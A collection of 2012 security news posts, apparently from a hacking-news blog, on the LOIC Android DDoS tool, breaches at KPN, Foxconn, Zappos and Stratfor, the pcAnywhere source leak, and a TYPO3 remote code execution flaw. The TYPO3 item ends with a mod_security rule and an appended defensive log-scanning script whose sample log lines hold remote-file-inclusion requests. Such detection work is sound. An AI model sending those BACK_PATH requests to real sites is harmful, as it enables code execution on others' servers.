February 22, 2012

DDoS Attack Tool Comes to Android

(LiveHacking.Com) – McAfee has reported that the common Low Orbit Ion Cannon (LOIC) denial of service (DoS) tool has been ported to Android. ‘Ported’ might be too strong a word, as this mobile device version is in fact a wrapper around the JavaScript version. Nonetheless, this is an interesting advancement in the ubiquity of hacking tools.

Hacktivism (hacking as political or social protest) is becoming increasingly popular, with groups like Anonymous using hacking tools to launch distributed denial of service attacks on organizations all over the world. LOIC, one such tool used by the hackers, was originally developed to stress-test websites; however, it has now been effectively used by hackers to take websites offline by sending a flood of TCP/UDP packets which overwhelms the server and makes it inaccessible.

Originally written in C#, LOIC inspired the creation of an independent JavaScript version. This version allowed a DoS attack to be launched from a web browser. In conjunction with PasteHTML, which allows anyone to post HTML onto the web anonymously (no pun intended), and the free AppsGeyser service, which converts web pages into an app, an Android app has been created which encapsulates the JavaScript version of LOIC. Specifically, the version spotted by McAfee targets the Argentinian government, but theoretically an Android app can be created to attack any web site. When the app is launched, a WebView component is used to run the JavaScript that sends 1,000 HTTP requests with the message “We are LEGION!” as one of the parameters.

“Creating Android applications that perform DoS attacks is now easy: It requires only the URL of an active web LOIC–and zero programming skills–thanks to automated online tools,” wrote Carlos Castillo for McAfee.

Dutch ISP KPN Security Breach

(LiveHacking.Com) – One of the largest ISPs in The Netherlands has shut down its email services after a security breach where hackers leaked the credentials and personal information of more than 500 of its customers.

KPN discovered the breach at the end of January but, after consulting with the Dutch government and law enforcement agencies, decided not to go public with the details. Once KPN discovered that account details were being posted online (at PasteBin), it decided to suspend its email services as a precautionary measure. On Saturday email services resumed and KPN sent customers information on how to reset their password.

KPN has over two million customers and it is unclear if the hackers got access to information about all of these accounts or just the 500 posted online.

Hackers Strike at iPhone Maker Foxconn

(LiveHacking.Com) – A hacking group calling themselves SwaggSec has launched an attack against Foxconn, the Chinese company which makes iPhones for Apple, and posted data it stole from their servers on The Pirate Bay. According to the blog 9to5Mac, the data contained usernames and passwords for company employees, which they were able to verify before access to the servers was shut down.

The hackers bragged about their attack on Pastebin, where they cited “inhuman conditions the workers experience” as one of the motivations for the hack. They also noted that “Foxconn did have an appropriate firewall” but the hackers were able to “bypass it almost flawlessly.”

It appears that the authorization credentials for Foxconn’s chief executive Terry Gou were among those included in the posted data, but the password is encrypted.

Symantec Working with Unnamed Law Enforcement Agency

(LiveHacking.Com) – Following my blog post about Anonymous releasing the source code for pcAnywhere, Symantec has contacted us here at LiveHacking.com with further details of the events leading up to the uploading of the source code. Symantec are underlining the following things:

  1. Symantec did NOT offer a bribe to Anonymous. Anonymous tried to extort Symantec for money to withhold posting of additional source code. (As a point of clarification – I didn’t say that Symantec offered a bribe and have never inferred it; the original blog post said that the hacker YamaTough asked for $50,000 not to release the source code.)
  2. The e-mail string posted on Pastebin by Anonymous was actually between them and a fake e-mail address set up by law enforcement.
  3. Once Symantec saw that it was a clear cut case of extortion, they contacted law enforcement and turned the investigation over to them. All subsequent communications were actually between Anonymous and law enforcement agents – not Symantec.

“The communications with the person(s) attempting to extort the payment from Symantec were part of the law enforcement investigation. Given that the investigation is still ongoing, we are not going to disclose the law enforcement agencies involved,” said Cris Paden of Symantec in his email to us.

Anonymous Releases Source Code for pcAnywhere [Updated]

Update: Symantec has contacted us here at LiveHacking.com with the following correction: The e-mail string posted on Pastebin by Anonymous was actually between them and a fake e-mail address set up by law enforcement. For more details see Symantec Working with Unnamed Law Enforcement Agency.

(LiveHacking.Com) – The hacking group Anonymous has tweeted that it has released the source code of Symantec’s pcAnywhere on The Pirate Bay. The release of the software seems to have come after a set of emails between a law enforcement agency (masquerading as Symantec) and the hacker YamaTough. The hacker tried to extort money from Symantec when he asked for $50,000 not to release the source code. According to the email exchange, the negotiations ended when the hacker gave the law enforcement agency (masquerading as Symantec) a 10 minute ultimatum: “we give you 10 minutes to decide which way you go after that two of your codes fly to the moon PCAnywhere and Norton Antivirus.” To which the law enforcement agency (masquerading as Symantec) replied “We can’t make a decision in ten minutes. We need more time.”

It seems that this then prompted the release of the source code. We spoke with a security expert who has downloaded the archive of the source code and his initial impression is that the release is genuine. According to our expert (who wishes to remain unnamed due to fears of possible reprisals by Symantec) the archive contains the following directories:

AccessServer
CE_Remote
CM
Development
InfoDev
Java_Remote
LU_Patches
Mac_ThinHost
RAPS
SCA
Shared
Tivoli
Unix_Host
pcA-NG
pcAnywhereExpress
pca32
pca_LiveState_2.0
pca_ONiCommand_3.0
r12.0-M1

The Development directory contains documentation including a document called “Programming Style Guide” which is marked as “Symantec Confidential” and pertains to “pcAnywhere / Decomposer / Packager”. The “pca32” project seems to contain source code with valid Microsoft Visual Studio project files.

According to ComputerWorld there is no official word yet from Symantec as “it happened so recently that we’re still in the process of analyzing and won’t be able to confirm until the morning.”

US-CERT Warns of On-going Denial-of-Service Attacks by Anonymous

(LiveHacking.Com) – The United States Computer Emergency Readiness Team (US-CERT), the operational arm of the National Cyber Security Division (NCSD) at the Department of Homeland Security (DHS), has issued a warning about on-going distributed denial-of-service attacks against different government institutions both in the USA and in the EU. According to the reports, these attacks are being attributed to the hacker group Anonymous.

Recent attacks by the group include:

  • Several Polish government web sites, including those of the Prime Minister, the President and Parliament. A Polish branch of Anonymous has already claimed responsibility for the attacks.
  • The European Parliament website, which came under cyber attack on Thursday.
  • The Irish Department for Justice website and the sites of several large financial institutions.
  • Other targets in the last week have included Universal Music, the U.S. Department of Justice and the Recording Industry Association of America.

The attacks are motivated either by the recent shutdown of the Megaupload site or by the signing of the international Anti-Counterfeiting Trade Agreement (ACTA).

US-CERT encourages users and administrators to do the following to reduce the risk associated with this and other malware campaigns:

Zappos.com Hacked and Turns off Phones to Avoid Deluge of Calls from Customers

(LiveHacking.Com) – Online shoes and clothing retailer Zappos.com has suffered a security breach. During the attack the hacker managed to gain access to parts of Zappos’ internal network through one of its servers in Kentucky. Zappos, however, say that the secure databases with the credit card details and other payment data were not accessed. On Sunday the company CEO Tony Hsieh sent an email to Zappos employees announcing the attack and previewed an email that would be sent to its customers:

We are writing to let you know that there may have been illegal and unauthorized access to some of your customer account information on Zappos.com, including one or more of the following: your name, e-mail address, billing and shipping addresses, phone number, the last four digits of your credit card number (the standard information you find on receipts), and/or your cryptographically scrambled password (but not your actual password).

The email then goes on to reassure customers that the secure database that stores their critical credit card and other payment data was NOT affected or accessed. It then asks customers to create new passwords. Due to the huge number of affected people, somewhere in the region of 20 million, Zappos are shutting down their customer support phone lines and are focusing on answering questions by email.

The recent security breach at Stratfor allowed security researchers to break over 80,000 of the nearly 1 million passwords, which had been posted online, in just 5 hours. This is due to advances in cracking hashed passwords using the processing power of modern graphics cards. Although the Zappos passwords have been reset, it is important that users change their password on any other website where they inadvertently used the same password.

Global Intelligence Company Hit by Anonymous. Or Was it?

(LiveHacking.Com) – The hacking group known as Anonymous says it has stolen emails, passwords and credit card information from the Texas-based security think-tank Strategic Forecasting, Inc. (Stratfor). According to the BBC, an alleged member of Anonymous posted an online message claiming that the group had used Stratfor clients’ credit card details to make “over a million dollars” in donations to different charities.

Stratfor’s website was defaced with the message “merry lulzxmas! are you ready for a week of mayhem? H0h0h0h0h0.” In response Stratfor took down its website and suspended email processing. The company, which provides independent analysis of international affairs and security threats, sent an e-mail Sunday to subscribers:

“On December 24th an unauthorized party disclosed personally identifiable information and related credit card data of some of our members. We have reason to believe that your personal and credit card data could have been included in the information that was illegally obtained and disclosed.”

However, in a bizarre twist, another posting appeared from Anonymous saying “hackers claiming to be Anonymous have distorted this truth in order to further their hidden agenda”.

“The leaked client list represents subscribers to a daily publication which is the primary service of Stratfor. Stratfor analysts are widely considered to be extremely unbiased. Anonymous does not attack media sources,” said Anonymous via an emergency Christmas Anonymous press release.

Facebook Scams with Chrome and FireFox Plugins

Picture Source: Websense security labs

(LiveHacking.Com) – Security researchers at Websense® have discovered new Facebook scams.

According to the report published by Websense®, the attacker uses social engineering tricks, such as an engaging video or the offer of a free voucher, to lure victims to its scam pages. The victims are then asked to install a browser plugin. Once installed, the plugin uses a malicious script and the Facebook API to post the scam to the victim’s friends’ pages.

According to the Websense® researchers, at the moment, only Chrome and Firefox plugins are being used.

More information is available at Websense® Security Blog.

Critical Vulnerability in TYPO3 Core: Remote Code Execution

(LiveHacking.Com) – The TYPO3 development team has issued a warning about a critical vulnerability in the TYPO3 content management system.

According to the TYPO3 security bulletin, a crafted request to a vulnerable TYPO3 installation will allow an attacker to load PHP code from an external source and execute it on the TYPO3 installation. The security issue is due to insufficient validation of the BACK_PATH parameter in the AbstractController.php file, which leads to remote code execution.

With reference to the TYPO3 security advisory, a vulnerable system will meet all of the following conditions:

  1. TYPO3 version 4.5.0 up to 4.5.8, 4.6.0 or 4.6.1 (+ development releases of 4.7 branch).
  2. The following PHP configuration variables set to “on”: register_globals (“off” by default, advised to be “off” in the TYPO3 Security Guide), allow_url_include (“off” by default) and allow_url_fopen (“on” by default).

The following solutions have been advised by the TYPO3 security advisory:

  1. Update to the TYPO3 version 4.5.9 or 4.6.2 that fixes the problem described.
  2. Set at least one of the following PHP configuration variables to “off”: register_globals, allow_url_include and allow_url_fopen.
  3. Apply the security patch.
  4. Set up a mod_security rule: SecRule ARGS:BACK_PATH "^(https?|ftp)" "deny".

Please view the TYPO3 security advisory for more information.
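As an added example, not code from the advisory or from the TYPO3 project, the script below puts the advisory's mod_security condition to defensive use: it scans constructed Apache combined-format access-log lines for the same BACK_PATH prefix that the SecRule denies, so an administrator can check whether such requests reached a site before the patch or the php.ini changes were applied. The log lines, the documentation-range IP addresses and the /typo3/example.php path are all made up for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (documentation IP ranges, a
# made-up script path); sample input for this example, not captured traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Feb/2012:10:01:12 +0000] "GET /typo3/example.php?M=web_list&BACK_PATH=http%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Feb/2012:10:02:40 +0000] "GET /typo3/example.php?M=web_list&BACK_PATH=../ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.11 - - [22/Feb/2012:10:03:01 +0000] "GET /index.php?id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.13 - - [22/Feb/2012:10:03:59 +0000] "GET /typo3/example.php?BACK_PATH=FTP%3A%2F%2F198.51.100.7%2Fx.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# The request line inside a combined-format entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# The same prefix test as the advisory's SecRule ARGS:BACK_PATH "^(https?|ftp)".
# It is applied case-insensitively here as the conservative choice for
# detection (the rule as quoted is case-sensitive). Like the rule, it is a bare
# prefix match, so a benign value such as "httpdocs/" fires as well; review hits.
REMOTE_SCHEME_RE = re.compile(r"^(https?|ftp)", re.IGNORECASE)


def back_path_values(target):
    """Return the percent-decoded BACK_PATH values from a request target's query string."""
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get("BACK_PATH", [])


def flag_remote_back_path(log_text):
    """Return (client_ip, decoded BACK_PATH) for every request whose BACK_PATH
    starts with a remote URL scheme; requests without BACK_PATH are ignored."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a well-formed combined-format entry
        client_ip = line.split(" ", 1)[0]
        for value in back_path_values(match.group("target")):
            if REMOTE_SCHEME_RE.match(value):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for client_ip, value in flag_remote_back_path(SAMPLE_LOG):
        print(f"{client_ip} sent BACK_PATH={value!r}")
```

Access logs carry only the query string, whereas the SecRule's ARGS collection also covers POST bodies, so an empty result here does not prove the rule would never have fired.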